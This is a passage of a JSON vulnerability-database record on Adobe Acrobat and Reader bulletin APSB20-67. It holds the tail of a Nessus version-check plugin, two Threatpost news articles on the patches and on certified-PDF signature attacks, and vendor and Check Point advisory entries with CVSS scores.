version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb20-67.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat version 2017.011.30175 / 2020.001.30005 / 2020.012.20048 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-24433\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Acrobat');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '20.012.20048', 'fixed_version' : '20.013.20064' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30005', 'fixed_version' : '20.001.30010' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30175', 'fixed_version' : '17.011.30180' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-11-03T16:16:39", "description": "Adobe has fixed critical-severity flaws tied to four CVEs in the Windows and macOS versions of its Acrobat and Reader family of application software services. The vulnerabilities could be exploited to execute arbitrary code on affected products.\n\nThese critical flaws include a heap-based buffer overflow (CVE-2020-24435), out-of-bounds write glitch (CVE-2020-24436) and two use-after free flaws (CVE-2020-24430 and CVE-2020-24437). The bugs are part of Adobe\u2019s regularly scheduled patches, [which overall patched critical-, important- and moderate-severity vulnerabilities](<https://helpx.adobe.com/security/products/acrobat/apsb20-67.html>) tied to 14 CVEs.\n\nTypically Adobe releases its regularly scheduled updates on the [second Tuesday of the month](<https://threatpost.com/critical-adobe-flaws-attackers-javascript-browsers/159026/>). However, \u201cWhile Adobe strives to release regularly scheduled updates on update Tuesday, occasionally those regularly scheduled security updates are released on non-update Tuesday dates,\u201d an Adobe spokesperson said. \u201cThe November 2020 release of Adobe Reader and Acrobat is a standard product release that includes new product features as well as fixes for bugs and security vulnerabilities.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBeyond critical-severity flaws, Adobe also patched important-severity vulnerabilities tied to six CVEs. These include issue- that allow for local privilege escalation, including an improper access control flaw (CVE-2020-24433), a signature-verification bypass issue (CVE-2020-24429) and a race-condition glitch (CVE-2020-24428).\n\nOther important severity flaws include two improper input-validation issues, with one leading to arbitrary JavaScript execution (CVE-2020-24432) and the other enabling information disclosure (CVE-2020-24427).\n\nAnother important-severity flaw stems from a security feature bypass that could allow for dynamic library injection (CVE-2020-24431).\n\nAnd, moderate-severity flaws tied to four CVEs could allow for information disclosure (CVE-2020-24426, CVE-2020-24434, CVE-2020-24438) and signature-verification bypass (CVE-2020-24439).\n\nAffected versions include Acrobat DC and Acrobat Reader DC Continuous versions 2020.012.20048 and earlier; (for Windows and macOS); Acrobat and Acrobat Reader Classic 2020 versions 2020.001.30005 and earlier (for Windows and macOS) and Acrobat and Acrobat Reader Classic 2017 versions 2017.011.30175 and earlier (for Windows and macOS).\n\nUsers can update to Acrobat DC and Acrobat Reader DC Continuous version 2020.013.20064; Acrobat and Acrobat Reader Classic 2020 version 2020.001.30010 and Acrobat and Acrobat Reader Classic 2017 version 2017.011.30180.\n\nThe flaws have a \u201cpriority 2\u201d rating, which [according to Adobe](<https://helpx.adobe.com/security/severity-ratings.html>) resolves vulnerabilities \u201cin a product that has historically been at elevated risk.\u201d\n\n\u201cThere are currently no known exploits,\u201d according to Adobe. \u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).\u201d\n\nUsers can update their product installations manually by choosing Help &gt; Check for Updates; however, the product will also update automatically, without requiring user intervention, when updates are detected.\n\nThe November patches come after a busy October for Adobe. After [warning of a critical vulnerability](<https://threatpost.com/flash-player-flaw-adobe-rce/160034/>) in its Flash Player application for users on Windows, macOS, Linux and ChromeOS operating systems, Adobe later in the month [released 18 out-of-band security patches](<https://threatpost.com/adobe-critical-code-execution-bugs/160369/>) in 10 different software packages, including fixes for critical vulnerabilities that stretch across its product suite. Adobe Illustrator was hit the hardest.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T15:55:09", "type": "threatpost", "title": "Adobe Warns Windows, MacOS Users of Critical Acrobat and Reader Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2020-11-03T15:55:09", "id": "THREATPOST:A2E3E8A3784C6F242EF67442B8BF3E81", "href": "https://threatpost.com/adobe-windows-macos-critical-acrobat-reader-flaws/160903/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-05-26T20:18:47", "description": "Certified portable document format (PDF) files are used to securely sign agreements between two parties while keeping the contents\u2019 integrity protected, but a new report found the security protections on most certified PDF applications were inadequate and left organizations exposed to a number of attacks.\n\nResearchers from Ruhr University Bochum explained certified PDFs use two specific signatures to authenticate the document, an Approval signature and a Certification signature. Certification signatures are the more flexible and made to handle complicated agreements between multiple parties and allow some changes to the document within a set of parameters while still maintaining its validity. \n[](<https://threatpost.com/newsletter-sign/>)Unsurprisingly, Certified signatures are where the team found vulnerabilities to two specific novel attacks they dubbed, \u201cEvil Annotation\u201d (EAA) and \u201cSneaky Signature\u201d (SSA). Both allow an [attacker to overlay malicious content](<https://pdf-insecurity.org/download/pdf-certification/paper.pdf>) (PDF) on top of the certified information without showing any signs it was altered.\n\n## **Novel Certified PDF Attacks **\n\nEAAs display malicious content in the document\u2019s annotations and then sends it on with its digital signature intact. SSAs add malicious content over legitimate content in the PDF itself.\n\nThe team said the results of its evaluation of the 26 most popular PDF applications were \u201calarming.\u201d\n\n\u201cIn only 2 cases, we could not find a vulnerability; 15 viewers were vulnerable to EAA, 8 to SSA, including Adobe, Foxit, and LibreOffice,\u201d the report said. \u201cWe additionally analyzed the standard-compliant implementation of PDF certification applications and found issues in 11 of them.\u201d\n\nAdobe had an additional flaw that allowed certified documents to execute JavaScript code, opening these users to code in injection attacks.\n\n\u201cFor example, a high-level JavaScript can call an arbitrary URL without user confirmation to deanonymize a user. Our research reveals that such code is also executed if it is added as an allowed incremental update. We are the first to reveal that this behavior allows attackers to directly embed malicious code into a certified document.\n\nThe team said it disclosed their findings to the appropriate vendors and provided a comprehensive vulnerability report, including exploits, to CERT-Bund (BSI). The report also lists the specific [certified PDF security flaws](<https://pdf-insecurity.org/signature/evaluation.html#security-evaluation-certification-attacks-2021>) found in each application.\n\n\u201cAdobe, Foxit, and LibreOffice responded quickly and provided patches for late 2020 (CVE-2020-35931) or early 2021 (CVE2021-28545, CVE-2021-28546),\u201d the report said. \u201cAdobe fixed the code injection vulnerability in early Nov. 2020 within a patch outside the regular update cycle (CVE-2020-24432). Currently, we participate in the standardization process via the German National Organization for Standardization (DIN) and the International Organization for Standardization (ISO) to address the reported attacks in the next PDF specification.\u201d\n\n## **Stopping Certified PDF Attacks **\n\nTo fend off Evil Annotation Attacks, the researchers recommend admins prohibit three particularly risky annotations that allow text or images to be added to a certified PDF, \u201cFreeText, Stamp and Redact.\u201d\n\nSneaky Signatures can be blocked by reducing permissions, but that is not a guarantee SSAs won\u2019t get through. Defined signature fields offer an additional layer of protection, the report said.\n\n\u201cSignature fields must be set up at defined locations in the PDF document before the document is certified,\u201d the report explained. \u201cA subsequent addition of signature fields must be penalized with an invalid certification status. Otherwise, it can always be used to add text or images included in the signature at any position.\u201d\n\nAdobe JavaScript code injections are trickier since in most cases the execution starts the moment the document is opened. \u201cThe only requirement is that the victim fully trusts the certificate used to certify the PDF document,\u201d the report said.\n\nEarlier this month [Adobe Acrobat issued a patch](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) for a zero-day bug targeting Windows users. Just days later, researchers at Microsoft Security Intelligence (MSI) found [PDFs were being used by attackers](<https://threatpost.com/email-campaign-fake-ransomware-rat/166378/>) to deliver StrRAT Java-based remote access tool (RAT) used to steal credentials, log keystrokes and take remote control over infected systems.\n\nThe flexibility offered by Certified signatures presents a massive, potentially catastrophic, security risk for many organizations and the report urges PDF applications to work quickly to come up with wide-scale fixes.\n\n\u201cThe research community has struggled with similar problems on other data formats, such as XML or Email, without finding a satisfying solution so far,\u201d they said. \u201cIn the case of PDF, the specification must be updated to address these issues.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-05-26T20:14:30", "type": "threatpost", "title": "PDF Feature \u2018Certified\u2019 Widely Vulnerable to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24432", "CVE-2020-35931", "CVE-2021-28546"], "modified": "2021-05-26T20:14:30", "id": "THREATPOST:E6E5A50C68621B44863933C4DBF4821C", "href": "https://threatpost.com/pdf-certified-widely-vulnerable-to-attack/166505/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "adobe": [{"lastseen": "2021-09-30T17:39:33", "description": "Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address [critical](), [important]() and [moderate]() vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-03T00:00:00", "type": "adobe", "title": "APSB20-67 Security update available for Adobe Acrobat and Reader", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2020-11-03T00:00:00", "id": "APSB20-67", "href": "https://helpx.adobe.com/security/products/acrobat/apsb20-67.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:03", "description": "A use-after-free vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Use After Free (APSB20-67: CVE-2020-24430)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24430"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1128", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:01", "description": "A memory corruption vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Memory Corruption (APSB20-67: CVE-2020-24427)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24427"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1123", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:37:07", "description": "A use-after-free vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Use After Free (APSB20-67: CVE-2020-24438)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24438"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1132", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:37:12", "description": "An out of bounds read vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to obtain sensitive information..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Out-Of-Bounds Read (APSB20-67: CVE-2020-24426)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24426"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1126", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:37:06", "description": "An out of bounds write vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to obtain sensitive information..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Out-of-bounds Write (APSB20-67: CVE-2020-24436)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24436"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1131", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:07", "description": "An out of bounds read vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to obtain sensitive information..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Out-of-bounds Read (APSB20-67: CVE-2020-24434)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24434"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1130", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:37:10", "description": "A vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Improper Authorization (APSB20-67: CVE-2020-24432)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24432"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1127", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:05", "description": "A use-after-free vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Use After Free (APSB20-67: CVE-2020-24437)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24437"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1129", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:08", "description": "A buffer overflow vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Buffer Overflow (APSB20-67: CVE-2020-24435)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24435"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1136", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:15", "description": "A privilege escalation vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability would allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Privilege Escalation (APSB20-67: CVE-2020-24433)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24433"], "modified": "2020-11-10T00:00:00", "id": "CPAI-2020-1122", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": 